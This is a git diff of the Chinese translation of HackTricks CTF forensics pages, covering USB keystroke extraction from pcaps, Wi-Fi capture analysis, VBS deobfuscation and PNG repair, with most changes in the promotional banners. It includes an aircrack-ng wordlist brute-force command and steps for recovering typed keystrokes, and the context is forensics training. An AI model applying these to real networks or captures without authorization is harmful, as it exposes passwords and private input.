||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,41 +1,43 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
如果您有一个USB连接的pcap文件,其中有很多中断,那么这可能是一个USB键盘连接。
|
||||
如果您有一个USB连接的pcap文件,其中有很多中断,很可能是USB键盘连接。
|
||||
|
||||
类似这样的Wireshark过滤器可能会有所帮助:`usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
|
||||
|
||||
重要的是要知道以"02"开头的数据是使用Shift键按下的。
|
||||
|
||||
您可以在以下链接中阅读更多信息并找到一些关于如何分析这些数据的脚本:
|
||||
您可以在以下链接中阅读更多信息并找到一些关于如何分析这些内容的脚本:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,43 +1,45 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
如果您有包含类似以下键盘USB通信的pcap文件:
|
||||
如果你有一个包含键盘 USB 通信的 pcap 文件,类似下面这样的:
|
||||
|
||||
![](<../../../.gitbook/assets/image (613).png>)
|
||||
|
||||
您可以使用工具[**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser)来获取通信中写入的内容:
|
||||
你可以使用工具 [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) 来获取通信中写入的内容:
|
||||
```bash
|
||||
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
|
||||
python3 usbkeyboard.py ./keystrokes.txt
|
||||
```
|
||||
您可以在以下链接中找到更多关于如何分析此内容以及一些脚本:
|
||||
您可以阅读更多信息并找到关于如何分析此内容的一些脚本:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 检查BSSID
|
||||
# 检查BSSIDs
|
||||
|
||||
当您收到一个主要流量为Wifi的捕获时,您可以使用WireShark开始调查捕获中的所有SSID,方法是_Wireless --> WLAN Traffic_:
|
||||
当你收到一个主要流量为Wifi的捕获文件时,你可以使用 WireShark 开始调查捕获文件中所有的 SSID,路径为_Wireless --> WLAN Traffic_:
|
||||
|
||||
![](<../../../.gitbook/assets/image (424).png>)
|
||||
|
||||
|
@ -23,23 +24,23 @@
|
|||
|
||||
## 暴力破解
|
||||
|
||||
该屏幕的一列指示**在pcap中是否找到任何身份验证**。如果是这种情况,您可以尝试使用`aircrack-ng`进行暴力破解:
|
||||
屏幕的一列指示了 pcap 文件中是否找到**任何身份验证**。如果是这种情况,你可以尝试使用 `aircrack-ng` 进行暴力破解:
|
||||
```bash
|
||||
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
|
||||
```
|
||||
# 数据在信标/侧通道中
|
||||
# 在信标/侧通道中的数据
|
||||
|
||||
如果您怀疑**数据正在Wifi网络的信标中泄漏**,您可以使用类似以下过滤器来检查网络的信标:`wlan contains <NAMEofNETWORK>`,或者 `wlan.ssid == "NAMEofNETWORK"`,在过滤后的数据包中搜索可疑字符串。
|
||||
如果你怀疑**数据正在泄漏到Wifi网络的信标中**,你可以使用类似以下过滤器来检查网络的信标:`wlan contains <NETWORK名称>`,或者 `wlan.ssid == "NETWORK名称"`,在过滤后的数据包中搜索可疑字符串。
|
||||
|
||||
# 在Wifi网络中查找未知MAC地址
|
||||
# 在Wifi网络中查找未知的MAC地址
|
||||
|
||||
以下链接将有助于找到**在Wifi网络中发送数据的设备**:
|
||||
|
||||
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
|
||||
|
||||
如果您已经知道**MAC地址,您可以从输出中删除它们**,添加类似这样的检查:`&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
如果你已经知道**MAC地址,你可以从输出中删除它们**,添加类似这样的检查:`&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
|
||||
一旦您发现**在网络中通信的未知MAC地址**,您可以使用类似以下的**过滤器**:`wlan.addr==<MAC地址> && (ftp || http || ssh || telnet)` 来过滤其流量。请注意,如果您已解密流量,ftp/http/ssh/telnet过滤器将非常有用。
|
||||
一旦你发现**在网络中通信的未知MAC地址**,你可以使用类似以下的**过滤器**:`wlan.addr==<MAC地址> && (ftp || http || ssh || telnet)` 来过滤其流量。请注意,如果你已解密流量,ftp/http/ssh/telnet过滤器将非常有用。
|
||||
|
||||
# 解密流量
|
||||
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
在这里,您可以找到特定文件类型和/或软件的有趣技巧:
|
||||
|
@ -32,21 +33,3 @@
|
|||
{% page-ref page="video-and-audio-file-analysis.md" %}
|
||||
|
||||
{% page-ref page="zips-tricks.md" %}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
一些有助于调试/反混淆恶意VBS文件的方法:
|
||||
一些有用于调试/反混淆恶意VBS文件的技巧:
|
||||
|
||||
## echo
|
||||
```bash
|
||||
|
@ -52,16 +53,17 @@ End With
|
|||
|
||||
End Function
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,33 +1,20 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
**PNG文件**在**CTF挑战**中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像**Wireshark**这样的工具通过解剖网络数据包中的PNG文件数据,可以分析PNG文件,揭示嵌入的信息或异常。
|
||||
|
||||
为了检查PNG文件的完整性并修复损坏,**pngcheck**是一个关键工具,提供命令行功能来验证和诊断PNG文件([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像[OfficeRecovery的PixRecovery](https://online.officerecovery.com/pixrecovery/)这样的在线服务提供了一个基于Web的解决方案,用于**修复损坏的PNG文件**,帮助CTF参与者恢复关键数据。
|
||||
|
||||
这些策略强调了在CTF中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
